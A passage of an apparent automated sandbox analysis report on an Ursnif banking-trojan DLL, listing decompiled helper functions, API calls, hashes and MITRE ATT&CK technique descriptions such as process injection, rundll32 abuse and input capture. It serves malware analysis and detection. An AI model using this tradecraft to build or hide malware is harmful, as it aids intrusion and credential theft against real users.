				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00A75C4E(_t2);
				if(_t34 != 0) {
					_t30 = E00A75C4E(_t28);
					if(_t30 == 0) {
						E00A72A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00A779AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00A779AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00a72ffc
0x00a73006
0x00a73008
0x00a7300e
0x00a7300e
0x00a73017
0x00a7301b
0x00a73027
0x00a7302b
0x00a7309f
0x00a7302d
0x00a7302d
0x00a73031
0x00a73038
0x00a7303b
0x00a73055
0x00a73044
0x00a73044
0x00a73048
0x00a7304b
0x00a73050
0x00a73050
0x00a7305a
0x00a73082
0x00a73088
0x00a7308b
0x00a7305c
0x00a7305e
0x00a73066
0x00a73071
0x00a73076
0x00a73076
0x00a73092
0x00a73099
0x00a7309a
0x00a7309a
0x00a7302b
0x00a730aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82,?,05569698), ref: 00A73008

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

Part of subcall function 00A779AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A73036,00000000,00000001,00000001,?,?,00A756E5,00000000,00000000,00000000,05569698), ref: 00A779BA
Part of subcall function 00A779AC: StrChrA.SHLWAPI(?,0000003F,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82,?,05569698,0000EA60,?), ref: 00A779C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82), ref: 00A73066
lstrcpy.KERNEL32(00000000,00000000), ref: 00A73076
lstrcpy.KERNEL32(00000000,00000000), ref: 00A73082

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 513e993e3ce27bed7e5f7330c38b5e574b5a9d5efef44ad86f6322c89c79f677
Instruction ID: e566959ab589bc4cf5554cd97b71c9a889f5ea334d5f9ffbea5058e371bf14ba
Opcode Fuzzy Hash: 513e993e3ce27bed7e5f7330c38b5e574b5a9d5efef44ad86f6322c89c79f677
Instruction Fuzzy Hash: 45218C72505255AFCF229FA4CC44AABBFB8AF06380B06C065F90D9B212D771CA42D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A74DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A74DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00A75C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00a74ddd
0x00a74de1
0x00a74deb
0x00a74df2
0x00a74df5
0x00a74df7
0x00a74dff
0x00a74e04
0x00a74e12
0x00a74e17
0x00a74e21

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,0556932C,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DD8
lstrlenW.KERNEL32(00A74ABB,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DDF

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DFF
memcpy.NTDLL(73B769A0,00A74ABB,00000002,00000000,004F0053,73B769A0,?,?,00A74ABB,004F0053,0556932C), ref: 00A74E12

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: bd023334093d90d3a13d434ccc372080040bddf542085eed90d1d305424ac98a
Instruction ID: 1a09e903901f364ed0cc928716432f580b80eb07fa18cce35596cb37c5b3370c
Opcode Fuzzy Hash: bd023334093d90d3a13d434ccc372080040bddf542085eed90d1d305424ac98a
Instruction Fuzzy Hash: CDF03732900118BB8B11EFA8CD85D9ABBACEE083547018062F908D7202E771EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A72829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
lstrlen.KERNEL32(?), ref: 00A72841

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
lstrcat.KERNEL32(00000000,?), ref: 00A72860

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 80d552652c23b147ebc562d1cb060d8d8135ccd64bdee2133f705a14d687225d
Instruction ID: 1347bd3a6f2a46d58b4dd5219cc18d5ddd514c4ced8cd97fa6c0f91474914de8
Opcode Fuzzy Hash: 80d552652c23b147ebc562d1cb060d8d8135ccd64bdee2133f705a14d687225d
Instruction Fuzzy Hash: 4CE092339016206787119FE59C48C9FBBBCEF99751704842BFA08D3120C72488478BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3436 Parent PID: 5052 rundll32.exeCOMMON

Executed Functions

Function 6E09F906, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB

Memory Dump Source

Source File: 00000003.00000002.1183886378.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6E064800, Relevance: 21.5, APIs: 5, Strings: 7, Instructions: 507windowCOMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56

Strings

Xn, xrefs: 6E064AA5
8n, xrefs: 6E0649EA
8n, xrefs: 6E064CD6
n, xrefs: 6E064E9E
Xn, xrefs: 6E064962
8n, xrefs: 6E064E05
Hn, xrefs: 6E064E69

Memory Dump Source

Source File: 00000003.00000002.1183797753.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ChangeFindFirstNotification$IconLoad
String ID: n$8n$8n$8n$Hn$Xn$Xn
API String ID: 2944710551-1746711009
Opcode ID: 74615b0fd95075c5500d78d91a654ae5c088b9483d44594a22a707b133a517dc
Instruction ID: acc7cb7fa391fc89751ac312106f52c5dffe102a73241e06447973bcf2392f78
Opcode Fuzzy Hash: 74615b0fd95075c5500d78d91a654ae5c088b9483d44594a22a707b133a517dc
Instruction Fuzzy Hash: 5C12AD71A08A11EFDF44CF68C9AC3693BE1F786715F05A62EE48487385D7349C478B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E065A90, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0

Strings

*, xrefs: 6E065D15

Memory Dump Source

Source File: 00000003.00000002.1183797753.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: *
API String ID: 544645111-163128923
Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3160 Parent PID: 5692 rundll32.exeCOMMON

Executed Functions

Function 6E09F906, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB

Memory Dump Source

Source File: 00000005.00000002.1183246772.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6E064800, Relevance: 21.5, APIs: 5, Strings: 7, Instructions: 507windowCOMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56

Strings

8n, xrefs: 6E0649EA
Xn, xrefs: 6E064962
n, xrefs: 6E064E9E
8n, xrefs: 6E064E05
Hn, xrefs: 6E064E69
Xn, xrefs: 6E064AA5
8n, xrefs: 6E064CD6

Memory Dump Source

Source File: 00000005.00000002.1183101841.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ChangeFindFirstNotification$IconLoad
String ID: n$8n$8n$8n$Hn$Xn$Xn
API String ID: 2944710551-1746711009
Opcode ID: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
Instruction ID: acc7cb7fa391fc89751ac312106f52c5dffe102a73241e06447973bcf2392f78
Opcode Fuzzy Hash: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
Instruction Fuzzy Hash: 5C12AD71A08A11EFDF44CF68C9AC3693BE1F786715F05A62EE48487385D7349C478B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E065A90, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0

Strings

*, xrefs: 6E065D15

Memory Dump Source

Source File: 00000005.00000002.1183101841.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: *
API String ID: 544645111-163128923
Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report a04.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Function 00FC4E9C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 00FC35A1, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 6E051979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00FC3946, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 00FC3CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6E0518D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E051566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6E051F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E051B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00FC6DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Function 00FC1B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 6E0517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 00FC57AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00FC2D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00FC1041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre